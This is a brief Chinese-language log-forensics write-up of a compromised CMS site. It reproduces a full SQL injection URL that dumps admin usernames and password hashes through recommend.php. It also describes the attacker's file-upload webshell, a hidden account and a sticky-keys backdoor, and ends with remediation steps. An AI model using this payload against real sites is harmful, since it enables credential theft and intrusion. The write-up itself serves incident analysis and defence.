一次簡單的日誌分析

從開始審計日誌(200狀態碼)發現sql注入payload

 

 

利用一下該payload肯定該網站存在sql注入，且攻擊者利用該漏洞獲取到了後臺帳戶以及密碼

注入點：http://192.168.31.35/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=

 

Payload:

http://192.168.31.35/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@`\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294

 

 

 攻擊者在

[27/May/2019:15:50:07 +0800]到

 

27/May/2019:15:50:09 +0800]

進行了後臺掃描

再翻看日誌發現文件上傳漏洞存在

url:/dede/file_manage_main.php?activepath=/uploads

此處存在任意文件上傳漏洞且攻擊者成功上傳PHP大馬

 

 

發現存在隱藏帳戶，而且留有5次shift後門

 

 

 

 

修復方案：

一、刪除後門、

二、全局優化文件上傳限制，改成白名單上傳

4、對URL進行轉碼編譯

五、加強密碼難度，使用更安全的加密手段

6、在代碼層面進行優化，嚴格判斷文件及變量參數的引入，防止未知文件被包含產生威脅

升級cms版本、mysql版本、

 

升級優化以後